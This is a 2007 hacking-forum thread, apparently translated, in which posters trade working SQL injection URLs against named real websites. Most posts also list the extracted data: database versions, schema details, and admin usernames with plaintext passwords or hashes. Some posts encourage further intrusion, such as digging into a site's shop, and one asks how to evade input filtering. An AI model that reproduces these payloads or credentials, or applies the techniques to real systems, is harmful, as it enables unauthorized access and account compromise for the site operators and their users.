SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. kair

    www.kochfeuer.de
    Softbiz Link Directory Script
     
    #3681 kair, 13 Nov 2007
    Last edited: 13 Nov 2007
  2. KEHT33

    HTML:
    http://www.algi.hdwao.pl/comment.php?what=article&id=12+UNION+SELECT+1,2,pass,4,admin,6,nick,icq,9+from+algi_users/*
    HTML:
    http://www.algi.hdwao.pl/comment.php?what=article&id=12+UNION+SELECT+1,2,pass,4,5,6,nick,icq,9+from+poezje_users/*
    DB 5
     
  3. FoxMALDER

    dinaitour.com - tourism in Ukraine
    4.1.20dinaitourdinaitour@localhost
    Code:
    http://www.dinaitour.com/tourism/tour/ukraine/?tour=3&sub=-1+union+select+1,concat_ws(0x05,version(),database(),user()),3,4/*
     
  4. FoxMALDER

    nadejda.com.ua - real estate agency
    5.0.45-lognadejda_nadejdanadejda_unadejda@localhost
    Code:
    http://www.nadejda.com.ua/index.php?page=list&prm=sale&x=&city=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x05,version(),database(),user()),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
    http://www.nadejda.com.ua/index.php?page=list&prm=sale&x=&city=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x05,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+information_schema.columns/*
    cities
    constypes
    flattypes
    main
    maps
    objects
    typetypes
     
    1 person likes this.
  5. FoxMALDER

    pizzamarketplace.com - Pizza Marketplace
    4.0.27-standardsitedbatmmarketplace@localhost
    Code:
    http://www.pizzamarketplace.com/research.php?rc_id=-1+union+select+concat_ws(0x05,version(),database(),user()),2,3,4,5,6,7,8,9/*
    Hungry? :D
     
    1 person likes this.
  6. FoxMALDER

    A series of sites made by the Granite5 studio

    P.S.: By the way, this is far from the full list of sites... About half! :D
     
    #3686 FoxMALDER, 14 Nov 2007
    Last edited: 14 Nov 2007
    4 people like this.
  7. K1nD[e]R

    Code:
    http://www.colorprint.ru/index.php?id=-37+union+select+concat_ws(0x2F,version(),user(),database()),2,3,4,5,6,7/*
    4.0.26/[email protected]/colorprintru
     
  8. KEHT33

    HTML:
    http://www.greenshift.com/news.php?id=-97+UNION+SELECT+1,user,password,4,5,6,7,8,9,10,11,12+from+mysql.user/*
     
  9. b3

    And here are some more noobs )) imagine that, the admin's password was 1234:
    http://www.apollo-tour.ru/

    admin:1234
    the admin panel is in the usual place: http://www.apollo-tour.ru/admin/index.php
     
    1 person likes this.
  10. b3

    Sorry for the advertising =\ I didn't think of it right away
     
  11. K1nD[e]R

    Code:
    http://michaelyoun.com/index.php?id=335+union+select+1,concat(login,0x7c,pass),3,4,5,concat_ws(0x2F,version(),user(),database())+from+users+limit+3,3//*
    Version : 4.0.17-standard/[email protected]/michael132576

     
    #3691 K1nD[e]R, 14 Nov 2007
    Last edited: 14 Nov 2007
  12. KEHT33

    So delete it... there's no need to post screenshots here... if everyone posts a screenshot, who knows what a mess it will turn into.


    HTML:
    http://www.thaitrademe.com/classifieds/product_desc.php?id=-4871+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
    DB 5

    HTML:
    http://www.classifiedbiz.com/product_desc.php?id=4635+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
    DB 4

    HTML:
    http://sigpig.com/product_desc.php?id=-139+UNION+SELECT+1,2,concat(admin_name,0x3b,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+sbauctions_admin/*
    HTML:
    http://sigpig.com/product_desc.php?id=-139+UNION+SELECT+1,2,concat(username,0x3b,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+sbauctions_members/*
    DB 5
     
    #3692 KEHT33, 14 Nov 2007
    Last edited: 14 Nov 2007
  13. K1nD[e]R

    Code:
    http://ukrfoto.dp.ua/download.php?id=-166+union+select+1,concat_ws(0x2F,user(),version(),database()),3,4,5,6/*
    ukrfoto@saturn/4.1.22-log/ukrfoto 3
     
  14. -MoLoToK-

    Code:
    http://www.heroesworld.ru/files.php?section=9999999'+union+select+1,concat_ws(0x2F,user(),version()%20%20,database())/*
    heroesv_bdu@localhost/4.1.20/heroesv_main
    Works only with 9999999.
     
    #3694 -MoLoToK-, 14 Nov 2007
    Last edited: 14 Nov 2007
  15. K1nD[e]R

    Real estate agency «ИНСАЙД НОРД ВЕСТ»

    Code:
    http://www.i-nw.ru/news.php?id=9999+union+select+1,version(),3,4,concat(login,char(58),password),6,7+from+users/*
    Version 4.1.20-log/[email protected]/db_insidenw_1

    Admins

    secretar:123
    luoman:12345
    fin:f2inw
     
    2 people like this.
  16. K1nD[e]R

    Code:
    http://www.roguegovernment.com/news.php?id=-4682+union+select+1,version(),aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x3a),0x3a),4,5,6+from+mysql.user/*
    Version root@localhost/4.1.7/roguegovernment

    Admins:

    root:6aee13f5467031e6
     
  17. K1nD[e]R

    Code:
    http://www.pro-tour.ru/news.php?id=772+union+select+1,concat_ws(0x2F,user(),version(),database()),3,4,5,6,7/*
    protour@19
    ----------------------------------------------------------------------------------------------------------

    Code:
    http://www.clarionrus.ru/news.php?id=-51+union+select+1,2,3,concat_ws(0x2F,version(),user(),database()),5,6/*
    4.1.20-lk-log/clarionrus@localhost/clarionrus
     
    #3697 K1nD[e]R, 14 Nov 2007
    Last edited: 14 Nov 2007
  18. fRg

    triennale.it
    Code:
    http://www.triennale.it/index.php?lang=_eng&id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,version(),database(),user()),43,44,45,46,47,48,49,50/*
    55 tables:
    Code:
    http://www.triennale.it/index.php?id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,table_name,43,44,45,46,47,48,49,50+from+information_schema.tables+limit+54,1/*
    As far as I understand, the admins table is utenti_gestionale:
    Code:
    http://www.triennale.it/index.php?id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,id_utente,password),43,44,45,46,47,48,49,50+from+utenti_gestionale+limit+0,1/*
    Its fields:
    Code:
    id_utente
    password
    grado
    There are three admins, "login:pass":
    Code:
    triennale:Triennale_6
    biglietteria:TrMilano
    biglietteriaTBVS:TBVS_
    The site has a SHOP; whoever is interested, dig further (Italian and I don't really get along!).
     
  19. K1nD[e]R

    Code:
    http://www.getsalt.com/news.php?id=-117+union+select+1,2,concat_ws(0x2F,version(),user(),database()),4,5,6,concat_ws(char(58,58),username,password,id),8,9,10,11,12+from+fb_users+limit+3,3/*
    Data: 5.0.22-log/getsalt@localhost/getsalt

    Admins:
    Login Password ID

    Anneleen test123 2
    kikivreeling vre27kik 19
     
  20. fRg

    Question!
    Site atdr.ro:
    Code:
    http://atdr.ro/index.php?id=-1/**/union/**/select/**/1,2,version(),4,5,6,7,8,9,10,11/*
    I got around the filtering of "+", but I just can't get around concat :mad:
    How to get around it?
    One more thing: when guessing tables, there is a strange reaction to a query for the user_password field from mysql.user
    Whoever digs deeper, post back (+)!
     